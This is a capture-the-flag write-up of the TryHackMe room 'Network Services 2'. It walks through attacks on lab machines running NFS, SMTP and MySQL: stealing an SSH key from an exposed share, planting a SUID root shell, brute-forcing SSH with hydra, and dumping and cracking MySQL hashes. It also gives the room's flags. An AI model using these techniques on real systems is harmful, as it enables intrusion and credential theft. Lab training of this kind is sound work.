This is a write-up of the TryHackMe room Network Services 2 found at https://tryhackme.com/room/networkservices2

Task 1 Get Connected

This task just made sure I was able to get connected to the TryHackMe VPN.

No answer needed

Task 2 Understanding NFS

NFS is a network file system that creates a storage location on the network and makes it available to users of the networ. It does this by mounting a directory from a host then use the RPC (Remote Procedure Call) protocol to connect it. The user id and group id are used to decide which permissions are followed for the file/directory. This will determin whether a user can or cannot read/write/execute the file. NFS can be used across non-similar operating systems such as Windows, Linux, or MacOS

What does NFS stand for?

Network File System

What process allows an NFS client to interact with a remote directory as though it was a physical device?

Mounting

What does NFS use to represent files and directories on the server?

file handle

What protocol does NFS use to communicate between the server and client?

RPC

What two pieces of user data does the NFS server take as parameters for controlling user permissions? Format: parameter 1 / parameter 2

user id / group id

Can a Windows NFS server share files with a Linux client? (Y/N)

Y

Can a Linux NFS server share files with a MacOS client? (Y/N)

Y

What is the latest version of NFS? [released in 2016, but is still up to date as of 2020] This will require external research.

4.2

Task 3 Enumerating NFS

Conduct a thorough port scan scan of your choosing, how many ports are open?

I ran a simple nmap scan and found 7 ports open.

7

Which port contains the service we’re looking to enumerate?

The NFS service is running on port 2049.

2049

Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?

I found the share /home from the output.

/home

I used the command below to mount the target’s share to my temp folder.

sudo mount -t nfs $ip:/home /tmp/mount/ -nolock

After the share was mounted I looked inside the /tmp/mount/ folder and found a folder called cappucino.

cappucino

Have a look inside this directory, look at the files. Looks like  we’re inside a user’s home directory…

No answer needed

Interesting! Let’s do a bit of research now, have a look through the folders. Which of these folders could contain keys that would give us remote access to the server?

The .ssh folder is the most interesting one because it is likely to have keys I could use to log in.

.ssh

Which of these keys is most useful to us?

Inside the .ssh directory was a public and private rsa key. The id_rsa is more valuable because it is the private key. Since I was already there I decided to dump the usernames from the public key before moving on.

This confirmed that the username cappucino was accurate from the hint from the name of the home folder. This also told me the machine name was polonfs.

Next, I copied the id_rsa file to my machine at ~/.ssh/, added permissions using the command chmod 600, then used that key to connect via ssh to the server using the username cappucino.

Can we log into the machine using ssh -i <key-file> <username>@<ip> ? (Y/N)

Y

Task 4 Exploiting NFS

First, change directory to the mount point on your machine, where the NFS share should still be mounted, and then into the user’s home directory.

No answer needed

First I downloaded the bash file mentioned in the task from github using the command
wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash

After the bash file downloaded, I used sudo chown root bash as instructed by the task to change the file ownership to root. After that I moved into the mounted home directory then used cp ~/Downloads/bash . to make a copy of the bash file I downloaded into the mounted share. This moved the file into the NFS server.

No answer needed

Now, we’re going to add the SUID bit permission to the bash executable we just copied to the share using sudo chmod +[permission] bash. What letter do we use to set the SUID bit set using chmod?

A quick google search told me that the SUID bit letter is s.

s

Let’s do a sanity check, let’s check the permissions of the “bash” executable using ls -la bash. What does the permission set look like? Make sure that it ends with -sr-x.

I found when running sudo chmod +s bash didn’t create the exact permissions required. It created permissions -rwSr-Sr--. I was able to get the correct permissions set by then using sudo chmod +x bash. This then gave me -rwsr-sr-x which was the correct answer to the question.

-rwsr-sr-x

Now, SSH into the machine as the user. List the directory to make sure the bash executable is there. Now, the moment of truth. Lets run it with ./bash -p. The -p persists the permissions, so that it can run as root with SUID- as otherwise bash will sometimes drop the permissions.

Great! If all’s gone well you should have a shell as root! What’s the root flag?

THM{nfs_got_pwned}

Task 5 Understanding SMTP

SMTP is the protocol responsible for sending out emails. It stands for Simple Mail Transfer Protocol. An SMTP server is what sorts emails around to the correct mailbox. SMTP operates on port 25 by default and can work with Windows and Linux machines.

The SMTP process begins by first starting the SMTP handshake which validates the sender and receiver of the message before sending the email. If the server is unable to send the message to the recipient’s server it will put the message into the SMTP queue.

Ultimately the message will get to the recipient’s email server which will be either POP3 or IMAP.

What does SMTP stand for?

Simple Mail Transfer Protocol

What does SMTP handle the sending of? (answer in plural)

emails

What is the first step in the SMTP process?

SMTP handshake

What is the default SMTP port?

25

Where does the SMTP server send the email if the recipient’s server is not available?

SMTP queue

On what server does the Email ultimately end up on?

POP/IMAP

Can a Linux machine run an SMTP server? (Y/N)

Y

Can a Windows machine run an SMTP server? (Y/N)

Y

Task 6 Enumerating SMTP

First, lets run a port scan against the target machine, same as last time. What port is SMTP running on?

I ran a simple nmap scan and found two ports open, 22 and 25 for ssh and smtp respectively.

25

Okay, now we know what port we should be targeting, let’s start up Metasploit. What command do we use to do this?

msfconsole

Let’s search for the module “smtp_version”, what’s it’s full module name?

In metasploit I found the module auxiliary/scanner/smtp/smtp_version.

auxiliary/scanner/smtp/smtp_version

Great, now- select the module and list the options. How do we do this?

I used the command use 0 to select the option number next to the module. Then to display the options that may need to be set before using the module I used the command options.

options

Have a look through the options, does everything seem correct? What is the option we need to set?

The above image shows that I needed to set the RHOSTS option in the module. The RHOST in Metasploit is essentially the target ip address.

RHOSTS

Set that to the correct value for your target machine. Then run the exploit. What’s the system mail name?

Running the exploit told me the server was running system mail name polosmtp.home

polosmtp.home

What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.

I ran a google search to learn more about Mail Tansfer Agents. I learned that they are basically an application or server that is sent mail by SMTP before the MTA uses POP3/IMAP to send to the recipient server.

There are 7 different types of MTAs according to my google search. It told me that one of the types was caleld Postfix. I remembered seeing this in the information given by the previous exploit.

Postfix

Good! We’ve now got a good amount of information on the target system to move onto the next stage. Let’s search for the module “smtp_enum“, what’s it’s full module name?

This time searching for smtp_enum I found the module auxiliary/scanner/smtp_enum

auxiliary/scanner/smtp/smtp_enum

What option do we need to set to the wordlist’s path?

First I needed to get a wordlist for usernames. I downloaded Seclists using sudo apt install seclists. Once done I used the username list found at /usr/share/seclists/Usernames/top-usernames-shortlist.txt.

Back in the metasploit console I used the command use 0 to select the smtp_enum module. In the modules options I discovered I needed to set RHOSTS and USER_FILE if I want to use something other than the default.

To select the SecList I just downloaded I ran set USER_FILE /usr/share/seclists/Usernames/top-usernames-shortlist.txt.

USER_FILE

Once we’ve set this option, what is the other essential paramater we need to set?

RHOSTS

Now, run the exploit, this may take a few minutes, so grab a cup of tea, coffee, water. Keep yourself hydrated!

No answer needed

Okay! Now that’s finished, what username is returned?

I ran the exploit and found the username administrator on the system.

administrator

Task 7 Exploiting SMTP

The username was acquired, so now all that was left was to crack the password. I used hydra and gave it the rockyou.txt password file as input. The full command used was hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt $ip ssh.

Hydra told me the password for administrator is alejandro.

What is the password of the user we found during our enumeration stage?

alejandro

Great! Now, let’s SSH into the server as the user, what is contents of smtp.txt

With the password in hand I was able to login to the ssh server on the target.

In the initial directory after connecting I found the smtp.txt file I was looking for.

I displayed the contents of the file using cat and found the challenge flag.

THM{who_knew_email_servers_were_c00l?}

Task 8 Understanding MySQL

MySQL is a relational database management system that is based on the SQL language. It runs on the client-server model with a centralized server location and other client systems connect to the server. One way that MySQL servers are useful is having them handle the back-end database needs of apps and websites.

What type of software is MySQL?

relational database management system

What language is MySQL based on?

SQL

What communication model does MySQL use?

client-server

What is a common application of MySQL?

back-end database

What major social network uses MySQL as their back-end database? This will require further research.

I ran a google search and discovered Facebook uses MySQL. However I also found other major sites use MySQL such as LinkedIn and Pinterest. However Facebook is the answer that solves the question.

Facebook

Task 9 Enumerating MySQL

This task assumes I had already found credentials for the mysql server of username root and password of password. I needed to then scan the IP address for which port holds the mysql service.

What port is MySQL using?

I ran a simple nmap scan using -Pn, which avoid DNS checking to speed up the test a little bit and included the entire port range using -p-.

I found mysql running on port 3306.

3306

With knowledge of the port number, I used the command mysql -h $ip -u root -P 3306 -p to connect to the server. I tried to include the password after the -p as in -p password added at the end of the command but it did not work correctly. Only using the exact command above seemed to work.

No answer needed

At this point I knew the login credentials actually work and we can access the mysql server with them. Next I opened metasploit and searched for the mysql_sql module. It can be found at auxiliary/admin/mysql/mysql_sql.

No answer needed

Search for, select and list the options it needs. What three options do we need to set? (in descending order).

I found there were three options I needed to set: password, rhosts, and username.

PASSWORD/RHOSTS/USERNAME

I set those options to the target’s information and ran the exploit.

The exploit told me the server is running on version 5.7.29-0ubuntu0.18.04.1.

By default it will test with the “select version()” command, what result does this give you?

5.7.29-0ubuntu0.18.04.1

Change the “sql” option to “show databases”. how many databases are returned?

4

Task 10 Exploiting MySQL

The task recommends using the mysql_schemadump module and first asks for its full location. I ran search mysql_schemadump and found it.

auxiliary/scanner/mysql/mysql_schemadump

What’s the name of the last table that gets dumped?

First I ran options to find what settings need to be adjusted. This one was the same as before, just password, rhosts, and username. I set those to the appropriate options based on what I already know about the server then ran the exploit.

The last table mentioned in the output was named x$waits_global_by_latency.

x$waits_global_by_latency

Search for and select the mysql_hashdump module. What’s the module’s full name?

I searched for the mysql_hashdump module and found it at auxiliary/scanner/mysql/mysql_hashdump.

auxiliary/scanner/mysql/mysql_hashdump

What non-default user stands out to you?

Just like before, I took a look at the options for the mysql_hashdump module and set the required configuration. Once everything was in place I hit run.

The exploit gave username and hashed passwords in the output. The most interesting username is carl beacause it is obviously not a default system user. The full text with hash is carl:*EA031893AA21444B170FC2162A56978B8CEECE18

carl

To simplify things I created a new text file called hash.txt and put the user/password hash text into the file using the command echo "carl:*EA031893AA21444B170FC2162A56978B8CEECE18" > hash.txt.

What is the user/hash combination string?

carl:*EA031893AA21444B170FC2162A56978B8CEECE18

Now, we need to crack the password! Let’s try John the Ripper against it using: “john hash.txt” what is the password of the user we found?

I used the tool John the Ripper in its default configuration and gave it the hash.txt file I just created. John found the password doggie for the carl username by just using john hash.txt.

doggie

Since I now know Carl uses this password for mysql it is worth checking the ssh server in case the same password is used there.

I was able to ssh into the server using the Carl’s same credentials. This is an example of reusing credentials across different systems causing poor security. If Carl had used a different password for ssh I would not have gotten this access.

What’s the contents of MySQL.txt?

In Carl’s default directory I found a text file named MySQL.txt with the contents THM{congratulations_you_got_the_mySQL_flag}.

THM{congratulations_you_got_the_mySQL_flag}